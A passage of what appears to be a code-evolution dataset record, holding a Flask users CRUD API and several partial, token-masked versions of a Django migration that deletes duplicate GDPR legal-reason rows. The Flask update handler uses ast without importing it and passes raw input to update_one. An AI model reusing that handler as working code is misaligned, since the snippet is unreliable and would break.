"step-5": "\"\"\"This module will serve the api request.\"\"\"\n\nimport json\nfrom bson.json_util import dumps\nfrom flask import abort, request, Response, jsonify\nfrom api import app, collection\n\n\[email protected](\"/api/v1/users\", methods=['POST'])\ndef create_user():\n \"\"\"\n Function to create new users.\n \"\"\"\n try:\n # Create new user\n try:\n body = request.get_json()\n except:\n # Bad request as request body is not available\n return abort(400)\n\n record_id = collection.insert(body)\n return jsonify({\"message\":\"Successfully Created the resource.\"}), 201\n\n except:\n # Error while trying to create the resource\n return \"Error while trying to create the resource\", 500\n\n\[email protected](\"/api/v1/users\", methods=['GET'])\ndef fetch_users():\n \"\"\"\n Function to fetch the users.\n \"\"\"\n try:\n # Fetch all the record(s)\n records_fetched = collection.find()\n\n # Check if the records are found\n if records_fetched.count() > 0:\n # Prepare the response\n records = dumps(records_fetched)\n resp = Response(records, status=200, mimetype='application/json')\n return resp\n else:\n # No records are found\n return jsonify({\"message\":\"No records are found\"}), 404\n except Exception as e:\n print(str(e))\n # Error while trying to fetch the resource\n return jsonify({\"message\":\"Error while trying to fetch the resource\"}), 500\n\n\[email protected](\"/api/v1/users/<user_id>\", methods=['POST'])\ndef update_user(user_id):\n \"\"\"\n Function to update the user.\n \"\"\"\n try:\n # Get the value which needs to be updated\n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n # Bad request as the request body is not available\n # Add message for debugging purpose\n return \"\", 400\n\n # Updating the user\n records_updated = collection.update_one({\"id\": int(user_id)}, body)\n\n # Check if resource is updated\n if records_updated.modified_count > 0:\n # Prepare the response as resource is updated successfully\n 
return \"\", 200\n else:\n # Bad request as the resource is not available to update\n # Add message for debugging purpose\n return \"\", 404\n except:\n # Error while trying to update the resource\n # Add message for debugging purpose\n return \"\", 500\n\n\[email protected](\"/api/v1/users/<user_id>\", methods=['DELETE'])\ndef remove_user(user_id):\n \"\"\"\n Function to remove the user.\n \"\"\"\n try:\n # Delete the user\n delete_user = collection.delete_one({\"id\": int(user_id)})\n\n if delete_user.deleted_count > 0 :\n # Prepare the response\n return \"\", 204\n else:\n # Resource Not found\n return \"\", 404\n except:\n # Error while trying to delete the resource\n # Add message for debugging purpose\n return \"\", 500\n\n\[email protected](404)\ndef page_not_found(e):\n \"\"\"Send message to the user with notFound 404 status.\"\"\"\n # Message to the user\n message = {\n \"err\":\n {\n \"msg\": \"This route is currently not supported. Please refer API documentation.\"\n }\n }\n # Making the message looks good\n resp = jsonify(message)\n # Sending OK response\n resp.status_code = 404\n # Returning the object\n return resp\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
def remove_duplicate_legal_reasons(apps, purpose_slug,
source_object_content_type, source_object_id):
LegalReason = apps.get_model(u'gdpr', u'LegalReason')
duplicate_legal_reason_qs = LegalReason.objects.filter(purpose_slug=
purpose_slug, source_object_content_type=source_object_content_type,
source_object_id=source_object_id)
if duplicate_legal_reason_qs.filter(is_active=True).count() > 0:
duplicate_legal_reason_qs.filter(is_active=False).delete()
latest_legal_reason = duplicate_legal_reason_qs.latest(u'expires_at')
duplicate_legal_reason_qs.exclude(pk=latest_legal_reason.pk).delete()
<|reserved_special_token_0|>
def check_uniqueness_and_keep_latest_active_legal_reason_related_object(apps,
schema_editor):
LegalReasonRelatedObject = apps.get_model(u'gdpr',
u'LegalReasonRelatedObject')
check_qs = LegalReasonRelatedObject.objects.values(u'legal_reason',
u'object_content_type', u'object_id').annotate(lrro_count=Count(
u'legal_reason')).filter(lrro_count__gt=1).order_by(u'-lrro_count'
).distinct()
for legal_reason_related_object in tqdm(check_qs.all(), ncols=100):
remove_duplicate_legal_reasons_relatives(apps,
legal_reason_related_object[u'legal_reason'],
legal_reason_related_object[u'object_content_type'],
legal_reason_related_object[u'object_id'])
class Migration(migrations.Migration):
dependencies = [(u'gdpr', u'0002_auto_20180509_1518'), (u'contenttypes',
u'0002_remove_content_type_name')]
operations = [migrations.AlterField(model_name=u'legalreason', name=
u'purpose_slug', field=models.CharField(choices=[], db_index=True,
max_length=100, verbose_name=u'purpose')), migrations.AlterField(
model_name=u'legalreason', name=u'source_object_id', field=models.
TextField(verbose_name=u'source object ID', db_index=True)),
migrations.AlterField(model_name=u'legalreasonrelatedobject', name=
u'object_id', field=models.TextField(verbose_name=
u'related object ID', db_index=True)), migrations.RunPython(
check_uniqueness_and_keep_latest_active_legal_reason), migrations.
RunPython(
check_uniqueness_and_keep_latest_active_legal_reason_related_object)]
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def remove_duplicate_legal_reasons(apps, purpose_slug,
source_object_content_type, source_object_id):
LegalReason = apps.get_model(u'gdpr', u'LegalReason')
duplicate_legal_reason_qs = LegalReason.objects.filter(purpose_slug=
purpose_slug, source_object_content_type=source_object_content_type,
source_object_id=source_object_id)
if duplicate_legal_reason_qs.filter(is_active=True).count() > 0:
duplicate_legal_reason_qs.filter(is_active=False).delete()
latest_legal_reason = duplicate_legal_reason_qs.latest(u'expires_at')
duplicate_legal_reason_qs.exclude(pk=latest_legal_reason.pk).delete()
<|reserved_special_token_0|>
def remove_duplicate_legal_reasons_relatives(apps, legal_reason,
object_content_type, object_id):
LegalReasonRelatedObject = apps.get_model(u'gdpr',
u'LegalReasonRelatedObject')
duplicates_qs = LegalReasonRelatedObject.objects.filter(legal_reason=
legal_reason, object_content_type=object_content_type, object_id=
object_id)
latest_legal_reason_related_object = duplicates_qs.latest(u'created_at')
duplicates_qs.exclude(pk=latest_legal_reason_related_object.pk).delete()
def check_uniqueness_and_keep_latest_active_legal_reason_related_object(apps,
schema_editor):
LegalReasonRelatedObject = apps.get_model(u'gdpr',
u'LegalReasonRelatedObject')
check_qs = LegalReasonRelatedObject.objects.values(u'legal_reason',
u'object_content_type', u'object_id').annotate(lrro_count=Count(
u'legal_reason')).filter(lrro_count__gt=1).order_by(u'-lrro_count'
).distinct()
for legal_reason_related_object in tqdm(check_qs.all(), ncols=100):
remove_duplicate_legal_reasons_relatives(apps,
legal_reason_related_object[u'legal_reason'],
legal_reason_related_object[u'object_content_type'],
legal_reason_related_object[u'object_id'])
class Migration(migrations.Migration):
dependencies = [(u'gdpr', u'0002_auto_20180509_1518'), (u'contenttypes',
u'0002_remove_content_type_name')]
operations = [migrations.AlterField(model_name=u'legalreason', name=
u'purpose_slug', field=models.CharField(choices=[], db_index=True,
max_length=100, verbose_name=u'purpose')), migrations.AlterField(
model_name=u'legalreason', name=u'source_object_id', field=models.
TextField(verbose_name=u'source object ID', db_index=True)),
migrations.AlterField(model_name=u'legalreasonrelatedobject', name=
u'object_id', field=models.TextField(verbose_name=
u'related object ID', db_index=True)), migrations.RunPython(
check_uniqueness_and_keep_latest_active_legal_reason), migrations.
RunPython(
check_uniqueness_and_keep_latest_active_legal_reason_related_object)]
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def remove_duplicate_legal_reasons(apps, purpose_slug,
source_object_content_type, source_object_id):
LegalReason = apps.get_model(u'gdpr', u'LegalReason')
duplicate_legal_reason_qs = LegalReason.objects.filter(purpose_slug=
purpose_slug, source_object_content_type=source_object_content_type,
source_object_id=source_object_id)
if duplicate_legal_reason_qs.filter(is_active=True).count() > 0:
duplicate_legal_reason_qs.filter(is_active=False).delete()
latest_legal_reason = duplicate_legal_reason_qs.latest(u'expires_at')
duplicate_legal_reason_qs.exclude(pk=latest_legal_reason.pk).delete()
def check_uniqueness_and_keep_latest_active_legal_reason(apps, schema_editor):
LegalReason = apps.get_model(u'gdpr', u'LegalReason')
check_qs = LegalReason.objects.values(u'purpose_slug',
u'source_object_content_type', u'source_object_id').annotate(lr_count
=Count(u'purpose_slug')).filter(lr_count__gt=1).order_by(u'-lr_count'
).distinct()
for legal_reason in tqdm(check_qs.all()):
remove_duplicate_legal_reasons(apps, legal_reason[u'purpose_slug'],
legal_reason[u'source_object_content_type'], legal_reason[
u'source_object_id'])
def remove_duplicate_legal_reasons_relatives(apps, legal_reason,
object_content_type, object_id):
LegalReasonRelatedObject = apps.get_model(u'gdpr',
u'LegalReasonRelatedObject')
duplicates_qs = LegalReasonRelatedObject.objects.filter(legal_reason=
legal_reason, object_content_type=object_content_type, object_id=
object_id)
latest_legal_reason_related_object = duplicates_qs.latest(u'created_at')
duplicates_qs.exclude(pk=latest_legal_reason_related_object.pk).delete()
def check_uniqueness_and_keep_latest_active_legal_reason_related_object(apps,
schema_editor):
LegalReasonRelatedObject = apps.get_model(u'gdpr',
u'LegalReasonRelatedObject')
check_qs = LegalReasonRelatedObject.objects.values(u'legal_reason',
u'object_content_type', u'object_id').annotate(lrro_count=Count(
u'legal_reason')).filter(lrro_count__gt=1).order_by(u'-lrro_count'
).distinct()
for legal_reason_related_object in tqdm(check_qs.all(), ncols=100):
remove_duplicate_legal_reasons_relatives(apps,
legal_reason_related_object[u'legal_reason'],
legal_reason_related_object[u'object_content_type'],
legal_reason_related_object[u'object_id'])
class Migration(migrations.Migration):
dependencies = [(u'gdpr', u'0002_auto_20180509_1518'), (u'contenttypes',
u'0002_remove_content_type_name')]
operations = [migrations.AlterField(model_name=u'legalreason', name=
u'purpose_slug', field=models.CharField(choices=[], db_index=True,
max_length=100, verbose_name=u'purpose')), migrations.AlterField(
model_name=u'legalreason', name=u'source_object_id', field=models.
TextField(verbose_name=u'source object ID', db_index=True)),
migrations.AlterField(model_name=u'legalreasonrelatedobject', name=
u'object_id', field=models.TextField(verbose_name=
u'related object ID', db_index=True)), migrations.RunPython(
check_uniqueness_and_keep_latest_active_legal_reason), migrations.
RunPython(
check_uniqueness_and_keep_latest_active_legal_reason_related_object)]
<|reserved_special_token_1|>
from __future__ import absolute_import
from __future__ import unicode_literals
from django.db import migrations, models
from django.db.models import Count
from tqdm import tqdm
def remove_duplicate_legal_reasons(apps, purpose_slug,
source_object_content_type, source_object_id):
LegalReason = apps.get_model(u'gdpr', u'LegalReason')
duplicate_legal_reason_qs = LegalReason.objects.filter(purpose_slug=
purpose_slug, source_object_content_type=source_object_content_type,
source_object_id=source_object_id)
if duplicate_legal_reason_qs.filter(is_active=True).count() > 0:
duplicate_legal_reason_qs.filter(is_active=False).delete()
latest_legal_reason = duplicate_legal_reason_qs.latest(u'expires_at')
duplicate_legal_reason_qs.exclude(pk=latest_legal_reason.pk).delete()
def check_uniqueness_and_keep_latest_active_legal_reason(apps, schema_editor):
LegalReason = apps.get_model(u'gdpr', u'LegalReason')
check_qs = LegalReason.objects.values(u'purpose_slug',
u'source_object_content_type', u'source_object_id').annotate(lr_count
=Count(u'purpose_slug')).filter(lr_count__gt=1).order_by(u'-lr_count'
).distinct()
for legal_reason in tqdm(check_qs.all()):
remove_duplicate_legal_reasons(apps, legal_reason[u'purpose_slug'],
legal_reason[u'source_object_content_type'], legal_reason[
u'source_object_id'])
def remove_duplicate_legal_reasons_relatives(apps, legal_reason,
object_content_type, object_id):
LegalReasonRelatedObject = apps.get_model(u'gdpr',
u'LegalReasonRelatedObject')
duplicates_qs = LegalReasonRelatedObject.objects.filter(legal_reason=
legal_reason, object_content_type=object_content_type, object_id=
object_id)
latest_legal_reason_related_object = duplicates_qs.latest(u'created_at')
duplicates_qs.exclude(pk=latest_legal_reason_related_object.pk).delete()
def check_uniqueness_and_keep_latest_active_legal_reason_related_object(apps,
schema_editor):
LegalReasonRelatedObject = apps.get_model(u'gdpr',
u'LegalReasonRelatedObject')
check_qs = LegalReasonRelatedObject.objects.values(u'legal_reason',
u'object_content_type', u'object_id').annotate(lrro_count=Count(
u'legal_reason')).filter(lrro_count__gt=1).order_by(u'-lrro_count'
).distinct()
for legal_reason_related_object in tqdm(check_qs.all(), ncols=100):
remove_duplicate_legal_reasons_relatives(apps,
legal_reason_related_object[u'legal_reason'],
legal_reason_related_object[u'object_content_type'],
legal_reason_related_object[u'object_id'])
class Migration(migrations.Migration):
dependencies = [(u'gdpr', u'0002_auto_20180509_1518'), (u'contenttypes',
u'0002_remove_content_type_name')]
operations = [migrations.AlterField(model_name=u'legalreason', name=
u'purpose_slug', field=models.CharField(choices=[], db_index=True,
max_length=100, verbose_name=u'purpose')), migrations.AlterField(
model_name=u'legalreason', name=u'source_object_id', field=models.
TextField(verbose_name=u'source object ID', db_index=True)),
migrations.AlterField(model_name=u'legalreasonrelatedobject', name=
u'object_id', field=models.TextField(verbose_name=
u'related object ID', db_index=True)), migrations.RunPython(
check_uniqueness_and_keep_latest_active_legal_reason), migrations.
RunPython(
check_uniqueness_and_keep_latest_active_legal_reason_related_object)]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-12-19 15:17
from __future__ import absolute_import
from __future__ import unicode_literals
from django.db import migrations, models
from django.db.models import Count
from tqdm import tqdm
def remove_duplicate_legal_reasons(apps, purpose_slug, source_object_content_type, source_object_id):
    """De-duplicate LegalReason rows for one (purpose, source object) tuple.

    If any duplicate is active, inactive duplicates are deleted first so
    that only active candidates remain; then every row except the one
    with the latest ``expires_at`` is removed.
    """
    # Use the historical model so the migration works regardless of the
    # current model definition.
    LegalReason = apps.get_model(u'gdpr', u'LegalReason')
    duplicate_legal_reason_qs = LegalReason.objects.filter(
        purpose_slug=purpose_slug,
        source_object_content_type=source_object_content_type,
        source_object_id=source_object_id
    )
    if duplicate_legal_reason_qs.filter(is_active=True).count() > 0:
        # Prefer active rows: drop inactive duplicates before choosing
        # the survivor below.
        duplicate_legal_reason_qs.filter(is_active=False).delete()
    latest_legal_reason = duplicate_legal_reason_qs.latest(u'expires_at')
    duplicate_legal_reason_qs.exclude(pk=latest_legal_reason.pk).delete()
def check_uniqueness_and_keep_latest_active_legal_reason(apps, schema_editor):
    """Data-migration step: collapse duplicate LegalReason rows.

    Groups rows by (purpose_slug, source content type, source id), and for
    every group that occurs more than once keeps a single survivor via
    remove_duplicate_legal_reasons().
    """
    LegalReason = apps.get_model(u'gdpr', u'LegalReason')
    # Aggregate to find keys with more than one row; largest groups first.
    check_qs = LegalReason.objects.values(u'purpose_slug', u'source_object_content_type', u'source_object_id').annotate(
        lr_count=Count(u'purpose_slug')).filter(lr_count__gt=1).order_by(u'-lr_count').distinct()
    # tqdm gives progress feedback for potentially long-running cleanup.
    for legal_reason in tqdm(check_qs.all()):
        remove_duplicate_legal_reasons(
            apps, legal_reason[u'purpose_slug'], legal_reason[u'source_object_content_type'],
            legal_reason[u'source_object_id']
        )
def remove_duplicate_legal_reasons_relatives(apps, legal_reason, object_content_type, object_id):
    """Keep only the newest ``LegalReasonRelatedObject`` for one (reason, object) pair."""
    LegalReasonRelatedObject = apps.get_model(u'gdpr', u'LegalReasonRelatedObject')
    related_qs = LegalReasonRelatedObject.objects.filter(
        legal_reason=legal_reason,
        object_content_type=object_content_type,
        object_id=object_id,
    )
    # The most recently created row survives; all its siblings are removed.
    newest = related_qs.latest(u'created_at')
    related_qs.exclude(pk=newest.pk).delete()
def check_uniqueness_and_keep_latest_active_legal_reason_related_object(apps, schema_editor):
    """Deduplicate ``LegalReasonRelatedObject`` rows grouped by their future unique key."""
    LegalReasonRelatedObject = apps.get_model(u'gdpr', u'LegalReasonRelatedObject')
    # Find (legal_reason, content type, object id) groups with more than one
    # row, largest groups first.
    duplicated_groups = (
        LegalReasonRelatedObject.objects
        .values(u'legal_reason', u'object_content_type', u'object_id')
        .annotate(lrro_count=Count(u'legal_reason'))
        .filter(lrro_count__gt=1)
        .order_by(u'-lrro_count')
        .distinct()
    )

    for group in tqdm(duplicated_groups.all(), ncols=100):
        remove_duplicate_legal_reasons_relatives(
            apps,
            group[u'legal_reason'],
            group[u'object_content_type'],
            group[u'object_id'],
        )
class Migration(migrations.Migration):
    """Add db indexes to legal-reason identifier fields and deduplicate
    existing rows so a uniqueness constraint can be introduced safely."""

    dependencies = [
        (u'gdpr', u'0002_auto_20180509_1518'),
        (u'contenttypes', u'0002_remove_content_type_name'),
    ]
    operations = [
        # Index the fields that make up the logical unique key of LegalReason.
        migrations.AlterField(
            model_name=u'legalreason',
            name=u'purpose_slug',
            field=models.CharField(choices=[], db_index=True,
                max_length=100, verbose_name=u'purpose'),
        ),
        migrations.AlterField(
            model_name=u'legalreason',
            name=u'source_object_id',
            field=models.TextField(verbose_name=u'source object ID', db_index=True),
        ),
        migrations.AlterField(
            model_name=u'legalreasonrelatedobject',
            name=u'object_id',
            field=models.TextField(verbose_name=u'related object ID', db_index=True),
        ),
        # Data migration: collapse pre-existing duplicates; no reverse step
        # is provided, so this migration is not reversible.
        migrations.RunPython(check_uniqueness_and_keep_latest_active_legal_reason),
        migrations.RunPython(check_uniqueness_and_keep_latest_active_legal_reason_related_object),
    ]
|
flexible
|
{
"blob_id": "6c86b4823756853bb502b34492ac8ad0a75daf7e",
"index": 7036,
"step-1": "<mask token>\n\n\ndef remove_duplicate_legal_reasons(apps, purpose_slug,\n source_object_content_type, source_object_id):\n LegalReason = apps.get_model(u'gdpr', u'LegalReason')\n duplicate_legal_reason_qs = LegalReason.objects.filter(purpose_slug=\n purpose_slug, source_object_content_type=source_object_content_type,\n source_object_id=source_object_id)\n if duplicate_legal_reason_qs.filter(is_active=True).count() > 0:\n duplicate_legal_reason_qs.filter(is_active=False).delete()\n latest_legal_reason = duplicate_legal_reason_qs.latest(u'expires_at')\n duplicate_legal_reason_qs.exclude(pk=latest_legal_reason.pk).delete()\n\n\n<mask token>\n\n\ndef check_uniqueness_and_keep_latest_active_legal_reason_related_object(apps,\n schema_editor):\n LegalReasonRelatedObject = apps.get_model(u'gdpr',\n u'LegalReasonRelatedObject')\n check_qs = LegalReasonRelatedObject.objects.values(u'legal_reason',\n u'object_content_type', u'object_id').annotate(lrro_count=Count(\n u'legal_reason')).filter(lrro_count__gt=1).order_by(u'-lrro_count'\n ).distinct()\n for legal_reason_related_object in tqdm(check_qs.all(), ncols=100):\n remove_duplicate_legal_reasons_relatives(apps,\n legal_reason_related_object[u'legal_reason'],\n legal_reason_related_object[u'object_content_type'],\n legal_reason_related_object[u'object_id'])\n\n\nclass Migration(migrations.Migration):\n dependencies = [(u'gdpr', u'0002_auto_20180509_1518'), (u'contenttypes',\n u'0002_remove_content_type_name')]\n operations = [migrations.AlterField(model_name=u'legalreason', name=\n u'purpose_slug', field=models.CharField(choices=[], db_index=True,\n max_length=100, verbose_name=u'purpose')), migrations.AlterField(\n model_name=u'legalreason', name=u'source_object_id', field=models.\n TextField(verbose_name=u'source object ID', db_index=True)),\n migrations.AlterField(model_name=u'legalreasonrelatedobject', name=\n u'object_id', field=models.TextField(verbose_name=\n u'related object ID', db_index=True)), 
migrations.RunPython(\n check_uniqueness_and_keep_latest_active_legal_reason), migrations.\n RunPython(\n check_uniqueness_and_keep_latest_active_legal_reason_related_object)]\n",
"step-2": "<mask token>\n\n\ndef remove_duplicate_legal_reasons(apps, purpose_slug,\n source_object_content_type, source_object_id):\n LegalReason = apps.get_model(u'gdpr', u'LegalReason')\n duplicate_legal_reason_qs = LegalReason.objects.filter(purpose_slug=\n purpose_slug, source_object_content_type=source_object_content_type,\n source_object_id=source_object_id)\n if duplicate_legal_reason_qs.filter(is_active=True).count() > 0:\n duplicate_legal_reason_qs.filter(is_active=False).delete()\n latest_legal_reason = duplicate_legal_reason_qs.latest(u'expires_at')\n duplicate_legal_reason_qs.exclude(pk=latest_legal_reason.pk).delete()\n\n\n<mask token>\n\n\ndef remove_duplicate_legal_reasons_relatives(apps, legal_reason,\n object_content_type, object_id):\n LegalReasonRelatedObject = apps.get_model(u'gdpr',\n u'LegalReasonRelatedObject')\n duplicates_qs = LegalReasonRelatedObject.objects.filter(legal_reason=\n legal_reason, object_content_type=object_content_type, object_id=\n object_id)\n latest_legal_reason_related_object = duplicates_qs.latest(u'created_at')\n duplicates_qs.exclude(pk=latest_legal_reason_related_object.pk).delete()\n\n\ndef check_uniqueness_and_keep_latest_active_legal_reason_related_object(apps,\n schema_editor):\n LegalReasonRelatedObject = apps.get_model(u'gdpr',\n u'LegalReasonRelatedObject')\n check_qs = LegalReasonRelatedObject.objects.values(u'legal_reason',\n u'object_content_type', u'object_id').annotate(lrro_count=Count(\n u'legal_reason')).filter(lrro_count__gt=1).order_by(u'-lrro_count'\n ).distinct()\n for legal_reason_related_object in tqdm(check_qs.all(), ncols=100):\n remove_duplicate_legal_reasons_relatives(apps,\n legal_reason_related_object[u'legal_reason'],\n legal_reason_related_object[u'object_content_type'],\n legal_reason_related_object[u'object_id'])\n\n\nclass Migration(migrations.Migration):\n dependencies = [(u'gdpr', u'0002_auto_20180509_1518'), (u'contenttypes',\n u'0002_remove_content_type_name')]\n operations = 
[migrations.AlterField(model_name=u'legalreason', name=\n u'purpose_slug', field=models.CharField(choices=[], db_index=True,\n max_length=100, verbose_name=u'purpose')), migrations.AlterField(\n model_name=u'legalreason', name=u'source_object_id', field=models.\n TextField(verbose_name=u'source object ID', db_index=True)),\n migrations.AlterField(model_name=u'legalreasonrelatedobject', name=\n u'object_id', field=models.TextField(verbose_name=\n u'related object ID', db_index=True)), migrations.RunPython(\n check_uniqueness_and_keep_latest_active_legal_reason), migrations.\n RunPython(\n check_uniqueness_and_keep_latest_active_legal_reason_related_object)]\n",
"step-3": "<mask token>\n\n\ndef remove_duplicate_legal_reasons(apps, purpose_slug,\n source_object_content_type, source_object_id):\n LegalReason = apps.get_model(u'gdpr', u'LegalReason')\n duplicate_legal_reason_qs = LegalReason.objects.filter(purpose_slug=\n purpose_slug, source_object_content_type=source_object_content_type,\n source_object_id=source_object_id)\n if duplicate_legal_reason_qs.filter(is_active=True).count() > 0:\n duplicate_legal_reason_qs.filter(is_active=False).delete()\n latest_legal_reason = duplicate_legal_reason_qs.latest(u'expires_at')\n duplicate_legal_reason_qs.exclude(pk=latest_legal_reason.pk).delete()\n\n\ndef check_uniqueness_and_keep_latest_active_legal_reason(apps, schema_editor):\n LegalReason = apps.get_model(u'gdpr', u'LegalReason')\n check_qs = LegalReason.objects.values(u'purpose_slug',\n u'source_object_content_type', u'source_object_id').annotate(lr_count\n =Count(u'purpose_slug')).filter(lr_count__gt=1).order_by(u'-lr_count'\n ).distinct()\n for legal_reason in tqdm(check_qs.all()):\n remove_duplicate_legal_reasons(apps, legal_reason[u'purpose_slug'],\n legal_reason[u'source_object_content_type'], legal_reason[\n u'source_object_id'])\n\n\ndef remove_duplicate_legal_reasons_relatives(apps, legal_reason,\n object_content_type, object_id):\n LegalReasonRelatedObject = apps.get_model(u'gdpr',\n u'LegalReasonRelatedObject')\n duplicates_qs = LegalReasonRelatedObject.objects.filter(legal_reason=\n legal_reason, object_content_type=object_content_type, object_id=\n object_id)\n latest_legal_reason_related_object = duplicates_qs.latest(u'created_at')\n duplicates_qs.exclude(pk=latest_legal_reason_related_object.pk).delete()\n\n\ndef check_uniqueness_and_keep_latest_active_legal_reason_related_object(apps,\n schema_editor):\n LegalReasonRelatedObject = apps.get_model(u'gdpr',\n u'LegalReasonRelatedObject')\n check_qs = LegalReasonRelatedObject.objects.values(u'legal_reason',\n u'object_content_type', 
u'object_id').annotate(lrro_count=Count(\n u'legal_reason')).filter(lrro_count__gt=1).order_by(u'-lrro_count'\n ).distinct()\n for legal_reason_related_object in tqdm(check_qs.all(), ncols=100):\n remove_duplicate_legal_reasons_relatives(apps,\n legal_reason_related_object[u'legal_reason'],\n legal_reason_related_object[u'object_content_type'],\n legal_reason_related_object[u'object_id'])\n\n\nclass Migration(migrations.Migration):\n dependencies = [(u'gdpr', u'0002_auto_20180509_1518'), (u'contenttypes',\n u'0002_remove_content_type_name')]\n operations = [migrations.AlterField(model_name=u'legalreason', name=\n u'purpose_slug', field=models.CharField(choices=[], db_index=True,\n max_length=100, verbose_name=u'purpose')), migrations.AlterField(\n model_name=u'legalreason', name=u'source_object_id', field=models.\n TextField(verbose_name=u'source object ID', db_index=True)),\n migrations.AlterField(model_name=u'legalreasonrelatedobject', name=\n u'object_id', field=models.TextField(verbose_name=\n u'related object ID', db_index=True)), migrations.RunPython(\n check_uniqueness_and_keep_latest_active_legal_reason), migrations.\n RunPython(\n check_uniqueness_and_keep_latest_active_legal_reason_related_object)]\n",
"step-4": "from __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom django.db import migrations, models\nfrom django.db.models import Count\nfrom tqdm import tqdm\n\n\ndef remove_duplicate_legal_reasons(apps, purpose_slug,\n source_object_content_type, source_object_id):\n LegalReason = apps.get_model(u'gdpr', u'LegalReason')\n duplicate_legal_reason_qs = LegalReason.objects.filter(purpose_slug=\n purpose_slug, source_object_content_type=source_object_content_type,\n source_object_id=source_object_id)\n if duplicate_legal_reason_qs.filter(is_active=True).count() > 0:\n duplicate_legal_reason_qs.filter(is_active=False).delete()\n latest_legal_reason = duplicate_legal_reason_qs.latest(u'expires_at')\n duplicate_legal_reason_qs.exclude(pk=latest_legal_reason.pk).delete()\n\n\ndef check_uniqueness_and_keep_latest_active_legal_reason(apps, schema_editor):\n LegalReason = apps.get_model(u'gdpr', u'LegalReason')\n check_qs = LegalReason.objects.values(u'purpose_slug',\n u'source_object_content_type', u'source_object_id').annotate(lr_count\n =Count(u'purpose_slug')).filter(lr_count__gt=1).order_by(u'-lr_count'\n ).distinct()\n for legal_reason in tqdm(check_qs.all()):\n remove_duplicate_legal_reasons(apps, legal_reason[u'purpose_slug'],\n legal_reason[u'source_object_content_type'], legal_reason[\n u'source_object_id'])\n\n\ndef remove_duplicate_legal_reasons_relatives(apps, legal_reason,\n object_content_type, object_id):\n LegalReasonRelatedObject = apps.get_model(u'gdpr',\n u'LegalReasonRelatedObject')\n duplicates_qs = LegalReasonRelatedObject.objects.filter(legal_reason=\n legal_reason, object_content_type=object_content_type, object_id=\n object_id)\n latest_legal_reason_related_object = duplicates_qs.latest(u'created_at')\n duplicates_qs.exclude(pk=latest_legal_reason_related_object.pk).delete()\n\n\ndef check_uniqueness_and_keep_latest_active_legal_reason_related_object(apps,\n schema_editor):\n LegalReasonRelatedObject = 
apps.get_model(u'gdpr',\n u'LegalReasonRelatedObject')\n check_qs = LegalReasonRelatedObject.objects.values(u'legal_reason',\n u'object_content_type', u'object_id').annotate(lrro_count=Count(\n u'legal_reason')).filter(lrro_count__gt=1).order_by(u'-lrro_count'\n ).distinct()\n for legal_reason_related_object in tqdm(check_qs.all(), ncols=100):\n remove_duplicate_legal_reasons_relatives(apps,\n legal_reason_related_object[u'legal_reason'],\n legal_reason_related_object[u'object_content_type'],\n legal_reason_related_object[u'object_id'])\n\n\nclass Migration(migrations.Migration):\n dependencies = [(u'gdpr', u'0002_auto_20180509_1518'), (u'contenttypes',\n u'0002_remove_content_type_name')]\n operations = [migrations.AlterField(model_name=u'legalreason', name=\n u'purpose_slug', field=models.CharField(choices=[], db_index=True,\n max_length=100, verbose_name=u'purpose')), migrations.AlterField(\n model_name=u'legalreason', name=u'source_object_id', field=models.\n TextField(verbose_name=u'source object ID', db_index=True)),\n migrations.AlterField(model_name=u'legalreasonrelatedobject', name=\n u'object_id', field=models.TextField(verbose_name=\n u'related object ID', db_index=True)), migrations.RunPython(\n check_uniqueness_and_keep_latest_active_legal_reason), migrations.\n RunPython(\n check_uniqueness_and_keep_latest_active_legal_reason_related_object)]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.16 on 2018-12-19 15:17\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nfrom django.db.models import Count\nfrom tqdm import tqdm\n\n\ndef remove_duplicate_legal_reasons(apps, purpose_slug, source_object_content_type, source_object_id):\n LegalReason = apps.get_model(u'gdpr', u'LegalReason')\n duplicate_legal_reason_qs = LegalReason.objects.filter(\n purpose_slug=purpose_slug,\n source_object_content_type=source_object_content_type,\n source_object_id=source_object_id\n )\n\n if duplicate_legal_reason_qs.filter(is_active=True).count() > 0:\n duplicate_legal_reason_qs.filter(is_active=False).delete()\n\n latest_legal_reason = duplicate_legal_reason_qs.latest(u'expires_at')\n duplicate_legal_reason_qs.exclude(pk=latest_legal_reason.pk).delete()\n\n\ndef check_uniqueness_and_keep_latest_active_legal_reason(apps, schema_editor):\n LegalReason = apps.get_model(u'gdpr', u'LegalReason')\n check_qs = LegalReason.objects.values(u'purpose_slug', u'source_object_content_type', u'source_object_id').annotate(\n lr_count=Count(u'purpose_slug')).filter(lr_count__gt=1).order_by(u'-lr_count').distinct()\n\n for legal_reason in tqdm(check_qs.all()):\n remove_duplicate_legal_reasons(\n apps, legal_reason[u'purpose_slug'], legal_reason[u'source_object_content_type'],\n legal_reason[u'source_object_id']\n )\n\n\ndef remove_duplicate_legal_reasons_relatives(apps, legal_reason, object_content_type, object_id):\n LegalReasonRelatedObject = apps.get_model(u'gdpr', u'LegalReasonRelatedObject')\n duplicates_qs = LegalReasonRelatedObject.objects.filter(\n legal_reason=legal_reason,\n object_content_type=object_content_type,\n object_id=object_id\n )\n latest_legal_reason_related_object = duplicates_qs.latest(u'created_at')\n duplicates_qs.exclude(pk=latest_legal_reason_related_object.pk).delete()\n\n\ndef 
